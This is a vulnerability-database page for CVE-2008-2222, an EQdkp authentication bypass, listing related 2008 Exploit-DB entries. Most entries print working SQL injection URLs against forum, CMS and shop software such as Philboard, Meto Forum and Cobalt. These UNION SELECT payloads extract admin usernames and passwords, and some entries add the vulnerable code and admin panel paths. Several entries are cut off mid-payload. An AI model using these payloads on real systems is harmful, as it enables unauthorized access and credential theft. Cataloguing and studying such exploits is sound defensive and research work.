CVE-2008-2222
Published 2008-05-14
CVE-2008-2222: SQL injection vulnerability in login.php in EQdkp 1.3.2f allows remote attackers to bypass EQdkp user authentication via the user_id parameter.
Priority: P344 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.06% (60.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eqdkp | eqdkp | — | — |
No detection rules found.
Exploit-DB
FipsCMS Light 2.1 - 'r' SQL Injection
exploitdb·2008-07-26
CVE-2008-3417 FipsCMS Light 2.1 - 'r' SQL Injection
---
Exploit Code:
victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin
victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin
http://localhost:2222/lab/cms/_admin
Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5
Found By U238
# Exploit Search Find: ^o)
#
# fipsCMS light - © fipsASP 2003 - 2008. All rights reserved
#
# fipsCMS light - © fipsASP 2003 - 2008
#
# inurl:"fipsASP 2003 - 2008"
# ************************************************
# milw0rm.com [2008-07-26]
Exploit-DB
philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection
exploitdb·2008-05-14
CVE-2008-2334 philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection
---
source: https://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuoku.asp?id=1+union+select+0,1,2,3,4,5,6,1,1,1,1,1,1,1,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,8,9,1,1,1,1,1,1,1,1,1,1+from+users
Exploit-DB
philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections
exploitdb·2008-05-14
CVE-2008-2334 philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuya_mesaj_yaz.asp?id=1+union+select+(password),username,password,password,4,1,1,1,null,1,password,password,password,password,password+from+users
Exploit-DB
philboard 0.5 - 'W1L3D4_foruma_yeni_konu_ac.asp?forumid' SQL Injection
exploitdb·2008-05-14
CVE-2008-2334 philboard 0.5 - 'W1L3D4_foruma_yeni_konu_ac.asp?forumid' SQL Injection
---
source: https://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_foruma_yeni_konu_ac.asp?forumid=1+union+select+0,1,(username),(password),1,1+from+users
Exploit-DB
EQdkp 1.3.2f - 'user_id' Authentication Bypass
exploitdb·2008-05-13
CVE-2008-2222 EQdkp 1.3.2f - 'user_id' Authentication Bypass
---
# milw0rm.com [2008-05-13]
Exploit-DB
Meto Forum 1.1 - Multiple SQL Injections
exploitdb·2008-05-13
CVE-2008-2448 Meto Forum 1.1 - Multiple SQL Injections
---
Meto Forum v1.1 Multiple Remote SQL Injection Vulnerable
Script : http://www.aspindir.com/goster/5444
Risk : The saved passwords of all forum users can be taken.
Coded : Asp , SQL Language = 'Access'
EİP [1] Exploit:
http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test
Log in Admin Panel > cookie Saved ,
This script file has an SQL injection attack.
http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1 2,3,4,5,6
http://localhost:2222/lab/M
Exploit-DB
Shader TV (Beta) - Multiple SQL Injections
exploitdb·2008-05-08
CVE-2008-6641 Shader TV (Beta) - Multiple SQL Injections
---
Shader TV (Beta) Multiple Remote SQL Injection Vulnerable
Script : http://www.aspindir.com/indir.asp?ID=5441
Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html
Coded : Asp
Language : Access
Discovered By U238 |
Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz :
Web - Designer Solution Developer
[email protected]
http://noexec.blogspot.com
0x1 = [S** Says : God damn you, Şiz0 !]
0x2 = [I only wanted to be a good person ]
Exploit:
The administrator login to the creative web panel is open to an SQL injection attack.
http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici
----
http://localhost:2222/lab/Shade
Exploit-DB
Angelo-Emlak 1.0 - Multiple SQL Injections
exploitdb·2008-04-26
CVE-2008-2048 Angelo-Emlak 1.0 - Multiple SQL Injections
---
Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable
Discovered By : U238
msn :setuid.noexec0x1[+]hotmail[-].com
webPage :http://noexec.blogspot.com
Script : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr)
Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html
Note : We're schizophrenic, brother, is anyone denying it? :( - God damn you, $iz0. And that's the quote of the year :D
Exploit:
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
Exploit-DB
W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection
exploitdb·2008-04-20
CVE-2008-1939 W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection
---
Philboard W1L3D4 v1.0 Multiple SQL Injection Vulnerable
Author : U238
mail : setuid.noexec0x1[aq]hotmail[dot]com
webpage: http://noexec.blogspot.com
Script : http://www.aspindir.com/Goster/4703
Script2: http://rapidshare.de/files/39107179/philboardtrge.zip.html
[0x1] Exploit:
http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users
http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users
*
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2
Exploit-DB
SuperNET Shop 1.0 - SQL Injection
exploitdb·2008-04-08
CVE-2008-6204 SuperNET Shop 1.0 - SQL Injection
---
SuperNET Shop v1.0 Remote SQL Injection Vulnerability
Discovered By : U238 (ugur238)
webpage : ugur238.org (the end)
mail : [email protected]
From : Turkey - Erzincan
Script : http://www.aspindir.com/indir.asp?ID=2
Script (alternative) : http://rapidshare.de/files/39062184/supershop.zip.html
Exploit:
localhost:2222/lab/shop/secure/admin/guncelle.asp?id=1+union+select+0,KullaniciAdi,2,sifre,4,5,6,7,8,9+from+admin
Error File : guncelle.asp
Error Code :
line - id = Request.QueryString("id")
line - SQL_L = "Select * from products WHERE id =" &id
Admin Panel : target/secure/admin
Admin Panel Bypass Exploit :
Error File :
giris.asp
Error Code :
Sorgu="select * from admin where KullaniciAdi = '" & request.form("ku
Exploit-DB
Cobalt 0.1 - Multiple SQL Injections
exploitdb·2008-04-05
CVE-2008-6202 Cobalt 0.1 - Multiple SQL Injections
---
CoBaLT v1.0 Remote SQL Injection Vulnerability
Discovered : U238
Mail : [email protected]
WebPage : http://ugur238.org (The End)
Script: http://www.aspindir.com/indir.asp?ID=5414
Script (Alternative) : http://rapidshare.de/files/39031038/cobaltv.1.zip.html
Exploit:
http://localhost:2222/lab/cobaltv.1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici
http://localhost:2222/lab/cobaltv.1/admin/bayi_listele.asp?git=duzenle&id=98+union+select+0,1,2,3,sifre,5,kadi,7,8+from+yonetici+where+id=2
----
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,kadi+from+yonetici
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,sifre+from+yon
No writeups or analysis indexed.
http://secunia.com/advisories/30206
http://www.securityfocus.com/bid/29184
https://exchange.xforce.ibmcloud.com/vulnerabilities/42381
https://www.exploit-db.com/exploits/5603
Published: 2008-05-14